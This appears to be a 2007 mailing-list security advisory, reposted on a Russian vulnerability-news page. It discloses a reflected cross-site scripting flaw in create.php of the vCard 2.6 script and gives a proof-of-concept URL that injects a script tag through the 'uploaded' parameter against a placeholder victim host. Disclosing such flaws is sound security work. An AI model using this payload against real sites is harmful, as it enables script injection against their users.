Уведомление о безопасности: XSS Remote In vCard 2.6 (c)2002

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  Wordpress <= v2.1.0
  Arbitrary file disclosure vulnerability in rrdbrowse <= 1.6
  LI-Guestbook SQL Injection Vulnerability
  Sava's GuestBook Multiple Vulnerabilities

From: RaeD Hasadya <raed_(at)_bsdmail.com>
Date: 5 марта 2007 г.
Subject: XSS Remote In vCard 2.6 (c)2002

Discovered By : Hasadya Raed
Contact : RaeD@BsdMail.Com
Script: vCard 2.6 (c)2002

******************************************************************************
Bug in : create.php

********************************************************************************
Exploit :
http://www.victim.com/path/create.php?uploaded=">**********alert(1)
;</script>
********************************************************************************

--
_______________________________________________
Get your free email from http://bsdmail.com

test server